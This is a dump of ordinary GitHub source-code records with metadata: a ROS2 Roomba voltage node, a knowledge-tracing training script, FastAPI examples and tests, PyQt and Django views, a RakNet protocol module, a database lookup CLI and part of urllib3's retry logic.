print('YES')\n","repo_name":"bud386/algo-CS","sub_path":"백준_문자열/5052_전화번호목록.py","file_name":"5052_전화번호목록.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27171020853","text":"# dispvolt_node.py\n# A node that shows the Roomba's battery voltage on the Roomba's LED\n# Based on https://demura.net/robot/ros2/20748.html\nimport rclpy # import the ROS2 Python module\nfrom rclpy.node import Node # import the Node class from the rclpy.node module\nfrom std_msgs.msg import Float32 # import the Float32 message type used for topic communication\nfrom std_msgs.msg import UInt8MultiArray # import the UInt8MultiArray message type used for topic communication\n\nclass DispVolt(Node):\n    \"\"\"Class that subscribes to the Roomba battery voltage topic battery/voltage and shows it on the LED\n    \"\"\"\n    def __init__(self):\n        \"\"\"Constructor. Creates the subscriber.\n        \"\"\"\n        # Call the Node class constructor and name the node 'disp_volt_node'.\n        super().__init__('disp_volt_node')\n        # Create the subscriber. The first argument of create_subscription, Float32, is the message type used on the topic.\n        # The second argument 'battery/voltage' is the topic name.\n        # The third argument is the callback function. The fourth argument is the queue size.\n        self.subscription = self.create_subscription(Float32,'battery/voltage', self.listener_callback, 10)\n        # Create the publisher. The first argument of create_publisher is the message type used on the topic.\n        # The UInt8MultiArray type carries the ASCII codes shown on the LED.\n        # The second argument 'set_ascii' is the topic name.\n        # The third argument is the queue size, which feeds the QOS (quality of service) settings.\n        # It is the upper bound on queued messages when the subscriber cannot receive data for some reason.\n        self.publisher = self.create_publisher(UInt8MultiArray,'set_ascii', 10)\n        # Create a UInt8MultiArray message object.\n        self.led = UInt8MultiArray()\n        print(\"*** dispvolt node ***\")\n\n\n    def listener_callback(self, msg):\n        \"\"\"Subscriber callback. Prints the voltage to the terminal and publishes the LED display message.\n        \"\"\"\n        self.get_logger().info(\"Voltage: %f\" % (msg.data))\n        # Build the list of ASCII codes to show on the LED.\n        self.led.data = [] # empty the list\n        volt_str = str(msg.data * 100) # the decimal point is not needed, so multiply by 100 to keep 4 digits\n        for chardata in volt_str[:4]: # take the first 4 characters and turn them into a list of ASCII codes\n            self.led.data.append(ord(chardata))\n        # Publish (send) the LED display message.\n        self.publisher.publish(self.led)\n\n\ndef main(args=None):\n    rclpy.init(args=args) # initialize the rclpy module\n    disp_volt = DispVolt() # create the node\n    rclpy.spin(disp_volt) # spin so the callback gets invoked\n    disp_volt.destroy_node() # destroy the node\n    rclpy.shutdown() # shut down the rclpy module\n\nif __name__ == '__main__':\n    main()","repo_name":"kanpapa/roomba","sub_path":"dispvolt/dispvolt/dispvolt_node.py","file_name":"dispvolt_node.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41474463790","text":"import os\nimport argparse\nimport json\n\nimport torch\ntorch.set_num_threads(4)\nfrom torch.optim import SGD, Adam\nimport copy\n\nfrom pykt.models import train_model,evaluate,init_model\nfrom pykt.utils import debug_print,set_seed\nfrom pykt.datasets import init_dataset4train\nimport 
datetime\n\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\ndevice = \"cpu\" if not torch.cuda.is_available() else \"cuda\"\nos.environ['CUBLAS_WORKSPACE_CONFIG']=':4096:2'\n\ndef save_config(train_config, model_config, data_config, params, save_dir):\n d = {\"train_config\": train_config, 'model_config': model_config, \"data_config\": data_config, \"params\": params}\n save_path = os.path.join(save_dir, \"config.json\")\n with open(save_path, \"w\") as fout:\n json.dump(d, fout)\n\ndef main(params):\n if \"use_wandb\" not in params:\n params['use_wandb'] = 1\n\n if params['use_wandb']==1:\n import wandb\n wandb.init()\n\n set_seed(params[\"seed\"])\n model_name, dataset_name, fold, emb_type, save_dir = params[\"model_name\"], params[\"dataset_name\"], \\\n params[\"fold\"], params[\"emb_type\"], params[\"save_dir\"]\n \n debug_print(text = \"load config files.\",fuc_name=\"main\")\n \n with open(\"../configs/kt_config.json\") as f:\n config = json.load(f)\n train_config = config[\"train_config\"]\n if model_name in [\"dkvmn\",\"deep_irt\", \"sakt\", \"saint\",\"saint++\", \"akt\", \"atkt\", \"lpkt\", \"skvmn\", \"dimkt\"]:\n train_config[\"batch_size\"] = 64 ## because of OOM\n if model_name in [\"simplekt\", \"bakt_time\", \"sparsekt\"]:\n train_config[\"batch_size\"] = 64 ## because of OOM\n if model_name in [\"gkt\"]:\n train_config[\"batch_size\"] = 16 \n if model_name in [\"qdkt\",\"qikt\"] and dataset_name in ['algebra2005','bridge2algebra2006']:\n train_config[\"batch_size\"] = 32 \n model_config = copy.deepcopy(params)\n for key in [\"model_name\", \"dataset_name\", \"emb_type\", \"save_dir\", \"fold\", \"seed\"]:\n del model_config[key]\n if 'batch_size' in params:\n train_config[\"batch_size\"] = params['batch_size']\n if 'num_epochs' in params:\n train_config[\"num_epochs\"] = params['num_epochs']\n # model_config = {\"d_model\": params[\"d_model\"], \"n_blocks\": params[\"n_blocks\"], \"dropout\": params[\"dropout\"], \"d_ff\": params[\"d_ff\"]}\n batch_size, num_epochs, optimizer = train_config[\"batch_size\"], train_config[\"num_epochs\"], train_config[\"optimizer\"]\n\n with open(\"../configs/data_config.json\") as fin:\n data_config = json.load(fin)\n if 'maxlen' in data_config[dataset_name]:#prefer to use the maxlen in data config\n train_config[\"seq_len\"] = data_config[dataset_name]['maxlen']\n seq_len = train_config[\"seq_len\"]\n\n print(\"Start init data\")\n print(dataset_name, model_name, data_config, fold, batch_size)\n \n debug_print(text=\"init_dataset\",fuc_name=\"main\")\n if model_name not in [\"dimkt\"]:\n train_loader, valid_loader, *_ = init_dataset4train(dataset_name, model_name, data_config, fold, batch_size)\n else:\n diff_level = params[\"difficult_levels\"]\n train_loader, valid_loader, *_ = init_dataset4train(dataset_name, model_name, data_config, fold, batch_size, diff_level=diff_level)\n\n params_str = \"_\".join([str(v) for k,v in params.items() if not k in ['other_config']])\n\n print(f\"params: {params}, params_str: {params_str}\")\n if params['add_uuid'] == 1 and params[\"use_wandb\"] == 1:\n import uuid\n # if not model_name in ['saint','saint++']:\n params_str = params_str+f\"_{ str(uuid.uuid4())}\"\n ckpt_path = os.path.join(save_dir, params_str)\n if not os.path.isdir(ckpt_path):\n os.makedirs(ckpt_path)\n print(f\"Start training model: {model_name}, embtype: {emb_type}, save_dir: {ckpt_path}, dataset_name: {dataset_name}\")\n print(f\"model_config: {model_config}\")\n print(f\"train_config: {train_config}\")\n\n if model_name in 
[\"dimkt\"]:\n # del model_config['num_epochs']\n del model_config['weight_decay']\n\n save_config(train_config, model_config, data_config[dataset_name], params, ckpt_path)\n learning_rate = params[\"learning_rate\"]\n for remove_item in ['use_wandb','learning_rate','add_uuid','l2']:\n if remove_item in model_config:\n del model_config[remove_item]\n if model_name in [\"saint\",\"saint++\", \"sakt\", \"atdkt\", \"simplekt\", \"bakt_time\"]:\n model_config[\"seq_len\"] = seq_len\n \n debug_print(text = \"init_model\",fuc_name=\"main\")\n print(f\"model_name:{model_name}\")\n model = init_model(model_name, model_config, data_config[dataset_name], emb_type)\n print(f\"model is {model}\")\n if model_name == \"hawkes\":\n weight_p, bias_p = [], []\n for name, p in filter(lambda x: x[1].requires_grad, model.named_parameters()):\n if 'bias' in name:\n bias_p.append(p)\n else:\n weight_p.append(p)\n optdict = [{'params': weight_p}, {'params': bias_p, 'weight_decay': 0}]\n opt = torch.optim.Adam(optdict, lr=learning_rate, weight_decay=params['l2'])\n elif model_name == \"iekt\":\n opt = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-6)\n elif model_name == \"dimkt\":\n opt = torch.optim.Adam(model.parameters(),lr=learning_rate,weight_decay=params['weight_decay'])\n else:\n if optimizer == \"sgd\":\n opt = SGD(model.parameters(), learning_rate, momentum=0.9)\n elif optimizer == \"adam\":\n opt = Adam(model.parameters(), learning_rate)\n \n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n validauc, validacc = -1, -1\n best_epoch = -1\n save_model = True\n \n debug_print(text = \"train model\",fuc_name=\"main\")\n \n if model_name == \"rkt\":\n testauc, testacc, window_testauc, window_testacc, validauc, validacc, best_epoch = \\\n train_model(model, train_loader, valid_loader, num_epochs, opt, ckpt_path, None, None, save_model, data_config[dataset_name], fold)\n else:\n testauc, testacc, window_testauc, window_testacc, validauc, validacc, best_epoch = train_model(model, train_loader, valid_loader, num_epochs, opt, ckpt_path, None, None, save_model)\n \n if save_model:\n best_model = init_model(model_name, model_config, data_config[dataset_name], emb_type)\n net = torch.load(os.path.join(ckpt_path, emb_type+\"_model.ckpt\"))\n best_model.load_state_dict(net)\n\n print(\"fold\\tmodelname\\tembtype\\ttestauc\\ttestacc\\twindow_testauc\\twindow_testacc\\tvalidauc\\tvalidacc\\tbest_epoch\")\n print(str(fold) + \"\\t\" + model_name + \"\\t\" + emb_type + \"\\t\" + str(round(testauc, 4)) + \"\\t\" + str(round(testacc, 4)) + \"\\t\" + str(round(window_testauc, 4)) + \"\\t\" + str(round(window_testacc, 4)) + \"\\t\" + str(validauc) + \"\\t\" + str(validacc) + \"\\t\" + str(best_epoch))\n model_save_path = os.path.join(ckpt_path, emb_type+\"_model.ckpt\")\n print(f\"end:{datetime.datetime.now()}\")\n \n if params['use_wandb']==1:\n wandb.log({ \n \"validauc\": validauc, \"validacc\": validacc, \"best_epoch\": best_epoch,\"model_save_path\":model_save_path})\n","repo_name":"pykt-team/pykt-toolkit","sub_path":"examples/wandb_train.py","file_name":"wandb_train.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"34"} +{"seq_id":"3877280588","text":"from datetime import datetime\nfrom unittest.mock import patch\n\nfrom bson import ObjectId\nfrom fastapi.testclient import TestClient\n\nfrom test.endpoints.sessions.conftest import Session\n\n\nclass TestSaveSession:\n 
@patch(\"operationsgateway_api.src.routes.sessions.datetime\")\n def test_save_session(\n self,\n mock_datetime,\n test_app: TestClient,\n login_and_get_token,\n ):\n mock_datetime.now.return_value = datetime.fromisoformat(\"2023-06-01T13:00:00\")\n mock_datetime.strftime.return_value = datetime.strftime(\n mock_datetime.now.return_value,\n \"%Y-%m-%d %H:%M:%S\",\n )\n\n name = \"Test Saving Session\"\n summary = \"Test Summary\"\n auto_saved = False\n session_data = {\"data\": 1234, \"test\": \"5678\"}\n\n test_response = test_app.post(\n f\"/sessions?name={name}&summary={summary}&auto_saved={auto_saved}\",\n json=session_data,\n headers={\"Authorization\": f\"Bearer {login_and_get_token}\"},\n )\n\n assert test_response.status_code == 201\n\n # Check the response is a valid object ID\n session_id = test_response.json()\n ObjectId(session_id)\n\n test_session = Session()\n query_result = test_session.find_one(session_id)\n assert query_result is not None\n\n test_session.delete(session_id)\n","repo_name":"ral-facilities/operationsgateway-api","sub_path":"test/endpoints/sessions/test_save_session.py","file_name":"test_save_session.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41994408555","text":"from __future__ import annotations\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom PyQt5.QtWidgets import QGridLayout, QLabel, QScrollArea, QSizePolicy, QWidget\n\nfrom novelwriter.extensions.switch import NSwitch\n\n\nclass NSwitchBox(QScrollArea):\n \"\"\"Extension: Switch Box Widget\n\n A widget that can hold a list of switches with labels and optional\n icons. The switch toggles emits a common signal with a switch key.\n \"\"\"\n\n switchToggled = pyqtSignal(str, bool)\n\n def __init__(self, parent: QWidget, baseSize: int) -> None:\n super().__init__(parent=parent)\n self._index = 0\n self._hSwitch = baseSize\n self._wSwitch = 2*self._hSwitch\n self._sIcon = baseSize\n self._widgets = []\n self.clear()\n return\n\n def clear(self) -> None:\n \"\"\"Rebuild the content of the core widget.\"\"\"\n self._index = 0\n self._widgets = []\n\n self._content = QGridLayout()\n self._content.setColumnStretch(1, 1)\n\n self._widget = QWidget()\n self._widget.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)\n self._widget.setLayout(self._content)\n\n self.setWidgetResizable(True)\n self.setWidget(self._widget)\n\n return\n\n def addLabel(self, text: str) -> None:\n \"\"\"Add a header label to the content box.\"\"\"\n label = QLabel(text)\n font = label.font()\n font.setBold(True)\n label.setFont(font)\n self._content.addWidget(label, self._index, 0, 1, 3, Qt.AlignLeft)\n self._widgets.append(label)\n self._bumpIndex()\n return\n\n def addItem(self, qIcon: QIcon, text: str, identifier: str, default: bool = False) -> None:\n \"\"\"Add an item to the content box.\"\"\"\n icon = QLabel(\"\")\n icon.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n icon.setPixmap(qIcon.pixmap(self._sIcon, self._sIcon))\n self._content.addWidget(icon, self._index, 0, Qt.AlignLeft)\n\n label = QLabel(text)\n self._content.addWidget(label, self._index, 1, Qt.AlignLeft)\n\n switch = NSwitch(width=self._wSwitch, height=self._hSwitch)\n switch.setChecked(default)\n switch.toggled.connect(lambda state: self._emitSwitchSignal(identifier, state))\n self._content.addWidget(switch, self._index, 2, Qt.AlignRight)\n\n self._widgets.append(switch)\n self._bumpIndex()\n\n return\n\n def 
addSeparator(self) -> None:\n        \"\"\"Add a blank entry in the content box.\"\"\"\n        spacer = QWidget()\n        spacer.setFixedHeight(int(0.5*self._sIcon))\n        self._content.addWidget(spacer, self._index, 0, 1, 3, Qt.AlignLeft)\n        self._widgets.append(spacer)\n        self._bumpIndex()\n        return\n\n    def setInnerContentsMargins(self, left: int, top: int, right: int, bottom: int) -> None:\n        \"\"\"Set the contents margins of the inner layout.\"\"\"\n        self._content.setContentsMargins(left, top, right, bottom)\n        return\n\n    ##\n    #  Internal Functions\n    ##\n\n    def _emitSwitchSignal(self, identifier: str, state: bool) -> None:\n        \"\"\"Emit a signal for a switch toggle.\"\"\"\n        self.switchToggled.emit(identifier, state)\n        return\n\n    def _bumpIndex(self) -> None:\n        \"\"\"Increase the index counter and make sure only the last\n        columns is stretching.\n        \"\"\"\n        self._content.setRowStretch(self._index, 0)\n        self._content.setRowStretch(self._index + 1, 1)\n        self._index += 1\n        return\n\n# END Class NSwitchBox\n","repo_name":"vkbo/novelWriter","sub_path":"novelwriter/extensions/switchbox.py","file_name":"switchbox.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":1592,"dataset":"github-code","pt":"34"} +{"seq_id":"73678508257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author : tangkaize\n#\n# _____ ______\n# ____==== ]OO|_n_n__][. | |]\n# [________]_|__|________)< \n# oo oo 'oo OOOO-| oo\\_ ~o~~~o~'\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+\n# @Time : 2022/12/27 15:33\n# @File: demo10.py  additional data types\n# @Software: PyCharm\nfrom datetime import datetime, timedelta, time\nfrom typing import Union\nfrom uuid import UUID\n\nimport uvicorn\nfrom fastapi import FastAPI, Body\n\napp = FastAPI()\n\n\n# Basic data types\n# int\n# float\n# str\n# bool\n# Other data types\n# UUID\n# datetime.datetime\n# datetime.date\n# datetime.time\n# datetime.timedelta\n# frozenset\n# bytes\n# Decimal\n@app.put('/items/{item_id}')\nasync def read_items(item_id: UUID,\n                     start_datetime: Union[datetime, None] = Body(default=None),\n                     end_datetime: Union[datetime, None] = Body(default=None),\n                     repeat_at: Union[time, None] = Body(default=None),\n                     process_after: Union[timedelta, None] = Body(default=None)):\n    start_process = start_datetime + process_after\n    duration = end_datetime - start_process\n    return {\n        \"item_id\": item_id,\n        \"start_datetime\": start_datetime,\n        \"end_datetime\": end_datetime,\n        \"repeat_at\": repeat_at,\n        \"process_after\": process_after,\n        \"start_process\": start_process,\n        \"duration\": duration,\n    }\n\n\nif __name__ == '__main__':\n    uvicorn.run('demo10:app', host='0.0.0.0', port=8000, reload=True)\n","repo_name":"alex-oos/learn-python","sub_path":"samples/web/fastapi/base/demo10.py","file_name":"demo10.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7042547225","text":"# stack implementation using list\nstack = []\n\n\ndef push():\n    element = int(input(\"enter the element\"))\n    stack.append(element)\n    print(stack)\n\n\ndef pop_element():\n    if not stack:\n        print(\"stack is empty\")\n    else:\n        e = stack.pop()\n        print(\"Removed element:\", e)\n        print(stack)\n\n\nwhile True:\n    print(\"select operation 1.push 2.pop 3.quit\")\n    choose = int(input())\n    if choose == 1:\n        push()\n    elif choose == 2:\n        pop_element()\n    elif choose == 3:\n        break\n    else:\n        print(\"Select the correct 
operation\")\n","repo_name":"Surya20233/Stack-implementation-by-using-list-linklist-Queue","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24138347136","text":"#! /usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport ncmirtools\nimport logging\n\nfrom ncmirtools.lookup import MicroscopyProductLookupViaDatabase\nfrom ncmirtools.config import NcmirToolsConfig\nfrom ncmirtools.config import ConfigMissingError\nfrom ncmirtools import config\n\n\n# create logger\nlogger = logging.getLogger('ncmirtools.mpidinfo')\n\nNO_MICROSCOPY_PRODUCT_FOUND_MSG = 'No matching Microscopy Product found'\n\n\nclass Parameters(object):\n \"\"\"Placeholder class for parameters\n \"\"\"\n pass\n\n\ndef _parse_arguments(desc, args):\n \"\"\"Parses command line arguments using argparse.\n \"\"\"\n parsed_arguments = Parameters()\n\n help_formatter = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=desc,\n formatter_class=help_formatter)\n parser.add_argument(\"mpid\", help='Microscopy product id (must be'\n 'an int less then 2^31)',\n type=int)\n parser.add_argument(\"--log\", dest=\"loglevel\", choices=['DEBUG',\n 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n help=\"Set the logging level (default WARNING)\",\n default='WARNING')\n parser.add_argument(\"--homedir\", help='Sets alternate home directory '\n 'under which the ' +\n NcmirToolsConfig.UCONFIG_FILE +\n ' is loaded (default ~)',\n default='~')\n parser.add_argument('--version', action='version',\n version=('%(prog)s ' + ncmirtools.__version__))\n\n return parser.parse_args(args, namespace=parsed_arguments)\n\n\ndef _run_search_database(mpid, homedir):\n \"\"\"Performs search for directory\n :param prefixdir: Directory search path\n :param mpid: microscopy product id to use to find directory\n :returns: exit code for program\n \"\"\"\n try:\n config = NcmirToolsConfig()\n config.set_home_directory(os.path.expanduser(homedir))\n\n search = MicroscopyProductLookupViaDatabase(config.get_config())\n res = search.get_microscopyproduct_for_id(mpid)\n if res is not None:\n sys.stdout.write(res.get_as_string())\n return 0\n\n sys.stderr.write(NO_MICROSCOPY_PRODUCT_FOUND_MSG + os.linesep)\n return 1\n except ConfigMissingError:\n sys.stderr.write('\\nERROR: Configuration file missing.\\n'\n ' Please run mpidinfo.py --help for '\n 'information on how\\n to create a configuration '\n 'file\\n\\n')\n return 3\n except Exception:\n logger.exception(\"Error caught exception\")\n return 2\n\n\ndef main(arglist):\n con = NcmirToolsConfig()\n desc = \"\"\"\n Version {version}\n\n Given a this script searches the database for\n a Microscopy Product that has this .\n The matching Microscopy Product will be output in this format\n\n Id: \n\n Image Basename:\n\n \n\n Notes:\n\n \n\n If no Microscopy Product matches the is found this\n program will output to standard error the message\n '{mpnotfound}'\n and exit with value 1.\n\n If there is an unknown error this program will output a message\n and exit with value 2.\n\n If {config_file}\n is missing then this program will output a message and exit\n with value 3.\n\n Example Usage:\n\n mpidinfo.py 123\n\n Id: 123\n\n Image Basename:\n\n foo\n\n Notes:\n\n some notes\n\n\n NOTE:\n\n This script requires a configuration file which contains\n the information to connect to the database.\n\n For this account the file should be located in one of 
these\n paths:\n\n {config_file}\n\n and should have the following format:\n\n [{db}]\n {user} = \n {password} = \n {port} = \n {host} = \n {database} = \n\n \"\"\".format(version=ncmirtools.__version__,\n mpnotfound=NO_MICROSCOPY_PRODUCT_FOUND_MSG,\n db=NcmirToolsConfig.POSTGRES_SECTION,\n user=NcmirToolsConfig.POSTGRES_USER,\n password=NcmirToolsConfig.POSTGRES_PASS,\n port=NcmirToolsConfig.POSTGRES_PORT,\n host=NcmirToolsConfig.POSTGRES_HOST,\n database=NcmirToolsConfig.POSTGRES_DB,\n config_file=', '.join(con.get_config_files()))\n\n theargs = _parse_arguments(desc, arglist[1:])\n theargs.program = arglist[0]\n theargs.version = ncmirtools.__version__\n config.setup_logging(logger, loglevel=theargs.loglevel)\n try:\n return _run_search_database(theargs.mpid, theargs.homedir)\n finally:\n logging.shutdown()\n\n\nif __name__ == '__main__': # pragma: no cover\n sys.exit(main(sys.argv))\n","repo_name":"CRBS/ncmirtools","sub_path":"ncmirtools/mpidinfo.py","file_name":"mpidinfo.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5206826537","text":"\"\"\"\n\"\"\"\n\nimport math\n\nt = int(input())\n\nfor i in range(t):\n n = int(input())\n z = 0\n\n count = 0\n while n/5 > 0:\n z = z + math.floor(n/5)\n n = n/5\n print(int(z))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_1/five_samples/python_files/18_3.py","file_name":"18_3.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39858319860","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport inspect\n\nimport six\n\nfrom rakpy.io import convert_to_stream\nfrom rakpy.protocol.const import MAGIC\nfrom rakpy.protocol.exceptions import UnknownPacketException, RemainingDataException\nfrom rakpy.protocol import fields\n\n\nclass PacketRegistry(dict):\n def __init__(self):\n super(PacketRegistry, self).__init__()\n\n def add(self, decorated_class):\n \"\"\"\n @add decorator\n :param decorated_class:\n \"\"\"\n id = decorated_class._meta.id\n if dict.__contains__(self, id):\n raise ValueError(\"Packet with id={} aldready registered\")\n dict.__setitem__(self, id, decorated_class)\n return decorated_class\nregistry = PacketRegistry()\n\n\n@convert_to_stream(\"data\")\ndef decode_packet(data):\n packet_id = six.indexbytes(data, 0)\n\n try:\n packet_class = registry[packet_id]\n except KeyError:\n raise UnknownPacketException(hex(packet_id))\n return packet_class(data)\n\n\nclass Options(object):\n def __init__(self, meta):\n self.id = meta.id\n self.structure = meta.structure\n self.fields = dict()\n\n def add_field(self, field, name):\n self.fields[name] = field\n\n\nclass PacketBase(type):\n def __new__(mcs, name, bases, attributes):\n super_new = super(PacketBase, mcs).__new__\n\n # Ensure initialization is only performed for subclasses of Packet\n # (excluding Packet class itself).\n parents = [b for b in bases if isinstance(b, PacketBase)]\n if not parents:\n return super_new(mcs, name, bases, attributes)\n\n module = attributes.pop('__module__')\n new_class = super_new(mcs, name, bases, {'__module__': module})\n\n # Add meta\n meta = attributes.pop('Meta')\n new_class.add_to_class(\"_meta\", Options(meta))\n\n # Add remaining attributes (fields are added here)\n for obj_name, obj in 
attributes.items():\n new_class.add_to_class(obj_name, obj)\n\n return new_class\n\n def add_to_class(cls, name, value):\n # We should call the contribute_to_class method only if it's bound\n if not inspect.isclass(value) and hasattr(value, 'contribute_to_class'):\n value.contribute_to_class(cls, name)\n else:\n setattr(cls, name, value)\n\n\nclass Packet(six.with_metaclass(PacketBase)):\n\n def __init__(self, *args, **kwargs):\n if len(args) == 1:\n self._init_from_buffer(args[0])\n super(Packet, self).__init__()\n\n @convert_to_stream(\"data\")\n def _init_from_buffer(self, data):\n self._data = data\n self._decode()\n\n def _get_id(self):\n return self._meta.id\n id = property(fget=lambda self: self._get_id())\n\n def _check_id(self, id):\n return id == self._meta.id\n\n def _get_structure(self):\n yield \"__id__\"\n for field_name in self._meta.structure:\n yield field_name\n\n def _decode(self):\n for name in self._get_structure():\n if name == \"__id__\":\n packet_id = fields.UnsignedByteField.decode(self._data)\n if not self._check_id(packet_id):\n raise ValueError()\n elif name == \"__magic__\":\n MagicField.decode(self._data)\n else:\n field = self._meta.fields[name]\n setattr(self, name, field.decode(self._data))\n if len(self._data):\n raise RemainingDataException(self._data)\n\n def __repr__(self):\n values = (\"=\".join([field_name, str(getattr(self, field_name))])\n for field_name in self._meta.structure if field_name != \"__magic__\")\n return \"{}({})\".format(type(self).__name__, \", \".join(values))\n\n\nclass MagicField(fields.Field):\n\n @classmethod\n @convert_to_stream(\"data\")\n def decode(cls, data):\n value = data.read(len(MAGIC))\n if value != MAGIC:\n raise ValueError()\n return b\"\"\n\n @classmethod\n def encode(cls, value):\n return MAGIC\n\n\nfrom rakpy.protocol.packets import *\n","repo_name":"jlirochon/rakpy","sub_path":"rakpy/protocol/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"27811994144","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.views.generic import View\n\nfrom ..models import (\n Student,\n Gewicht,\n Platz,\n Zeitraum,\n)\n\n\nclass StudentDetail(View):\n template_name = 'bp_cupid/student.html'\n\n @method_decorator(login_required)\n @method_decorator(user_passes_test(lambda u: u.is_staff))\n def get(self, request, mat_nr):\n \"\"\"\n Zeigt die Gewichte zu allen Praxen vom ausgewählten Studenten an.\n \"\"\"\n s = get_object_or_404(Student, mat_nr=mat_nr)\n\n akt_verw_zr = request.user.mitarbeiter.akt_verw_zeitraum\n aktuelle_zeitraeume = Zeitraum.objects.filter(\n block__verwaltungszeitraum=akt_verw_zr,\n )\n\n gewichte = Gewicht.objects.filter(\n student__mat_nr=mat_nr\n ).prefetch_related('praxis__freie_zeitraeume').order_by('-wert')\n\n try:\n platz = Platz.objects.select_related('praxis').get(student=s)\n except Platz.DoesNotExist:\n platz = None\n\n context = {\n 'student': s,\n 'gewichte': gewichte,\n 'platz': platz,\n 'aktuelle_zeitraeume': aktuelle_zeitraeume,\n }\n\n return render(request, self.template_name, context)\n\n\nclass StudentList(View):\n template_name = 'bp_cupid/studenten.html'\n\n @method_decorator(login_required)\n @method_decorator(user_passes_test(lambda u: u.is_staff))\n def get(self, request):\n \"\"\"\n Zeigt alle 
Studenten in einer Tabelle nach Nachname sortiert an.\n \"\"\"\n akt_verw_zr = request.user.mitarbeiter.akt_verw_zeitraum\n\n context = {\n 'studenten': Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr\n ).select_related(\n 'platz'\n ).prefetch_related(\n 'landkreise',\n 'bevorzugte_praxen',\n ).order_by('name'),\n }\n\n anz_studis = Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr\n ).count()\n\n if anz_studis:\n anz_studis_mit_fragebogen = Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr,\n hat_fragebogen_ausgefuellt=True,\n ).count()\n\n rel_fragebogen = round(\n 100 * anz_studis_mit_fragebogen / anz_studis, 1\n )\n\n context.update(\n {\n 'anz_studis': anz_studis,\n 'anz_studis_mit_fragebogen': anz_studis_mit_fragebogen,\n 'rel_fragebogen': rel_fragebogen,\n }\n )\n\n return render(request, self.template_name, context)\n","repo_name":"hutchison/bp_mgmt","sub_path":"bp_cupid/views/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35848624731","text":"from __future__ import absolute_import\n\nimport email\nimport logging\nimport re\nimport time\nimport warnings\nfrom collections import namedtuple\nfrom itertools import takewhile\n\nfrom ..exceptions import (\n ConnectTimeoutError,\n InvalidHeader,\n MaxRetryError,\n ProtocolError,\n ProxyError,\n ReadTimeoutError,\n ResponseError,\n)\nfrom ..packages import six\n\nlog = logging.getLogger(__name__)\n\n\n# Data structure for representing the metadata of requests that result in a retry.\nRequestHistory = namedtuple(\n \"RequestHistory\", [\"method\", \"url\", \"error\", \"status\", \"redirect_location\"]\n)\n\n\n# TODO: In v2 we can remove this sentinel and metaclass with deprecated options.\n_Default = object()\n\n\nclass _RetryMeta(type):\n @property\n def DEFAULT_METHOD_WHITELIST(cls):\n warnings.warn(\n \"Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_ALLOWED_METHODS\n\n @DEFAULT_METHOD_WHITELIST.setter\n def DEFAULT_METHOD_WHITELIST(cls, value):\n warnings.warn(\n \"Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_ALLOWED_METHODS = value\n\n @property\n def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls):\n warnings.warn(\n \"Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT\n\n @DEFAULT_REDIRECT_HEADERS_BLACKLIST.setter\n def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls, value):\n warnings.warn(\n \"Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and \"\n \"will be removed in v2.0. Use 